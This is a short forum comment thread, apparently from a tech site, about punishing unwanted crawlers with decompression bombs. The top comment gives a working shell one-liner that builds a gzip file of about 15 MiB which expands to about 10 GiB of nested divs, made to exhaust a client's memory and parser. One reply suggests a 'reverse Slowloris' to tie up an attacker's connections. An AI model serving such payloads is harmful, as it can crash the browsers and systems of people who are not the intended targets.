Comment by Ugohcet

7 months ago

Why use squashfs when you can do the same OP did and serve a compressed version, so that the client is overwhelmed by both the uncompression and the DOM depth:

yes "<div>"|dd bs=1M count=10240 iflag=fullblock|gzip | pv > zipdiv.gz

Resulting file is about 15 mib long and uncompresses into a 10 gib monstrosity containing 1789569706 unclosed nested divs

3 comments

Ugohcet

sroussey 7 months ago

You can also just use code to endlessly serve up something.

Also you can reverse many DoD vectors depending on how you are setup and costs. For example reverse Slowloris attack and use up their connections.

M95D 7 months ago

I like it. :)

imron 6 months ago

This is beautiful